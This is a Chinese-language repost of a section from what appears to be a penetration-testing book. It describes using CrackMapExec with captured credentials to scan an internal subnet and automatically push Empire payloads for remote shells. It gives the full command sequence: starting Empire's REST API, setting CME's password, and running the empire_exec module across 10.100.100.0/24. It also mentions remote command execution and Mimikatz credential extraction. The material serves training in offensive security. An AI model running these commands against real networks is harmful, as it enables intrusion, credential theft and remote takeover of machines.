文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
4.5 使用 CrackMapExec(CME)扫描网络
如果还没有突破的系统,但我们确实通过 Responder、配置错误的网络应用程序、暴力破解或打印机获得了凭证,那么可以尝试扫描网络,查看账户可以登录的位置。使用像 CrackMapExec(CME)等工具进行简单的扫描,可以帮助找到内部网络初始突破点。
从已经取得的效果看,我们使用 CME 扫描网络,识别/验证网络上的 SMB 资源,在多个主机上远程执行命令,甚至通过 Mimikatz 提取明文凭证。Empire 和 CME 提供新的功能,我们可以利用 Empire 的 REST 功能。在下面的场景中,我们将使用其 REST API 启动 Empire,在 CME 中配置密码,将 CME 连接到 Empire,使用掌握的单个凭证扫描网络,最后,如果通过身份鉴权,则自动推送 Empire 静荷到远程被攻击者的系统,如图 4.9 所示。如果您有帮助账户或特权账户,那么准备加载 Empire shells 吧!
图 4.9
- 启动 Empire 的 REST API 服务器。
- cd /opt/Empire
- ./empire --rest –password 'hacktheuniverse'
- 更改 CrackMapExec 密码。
- gedit /root/.cme/cme.conf
- password=hacktheuniverse
- 运行 CME,生成 Empire Shell。
- cme smb 10.100.100.0/24 –d 'cyberspacekittens.local' –u '<username>' – p '<password>' - M empire_exec -o LISTENER = http
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论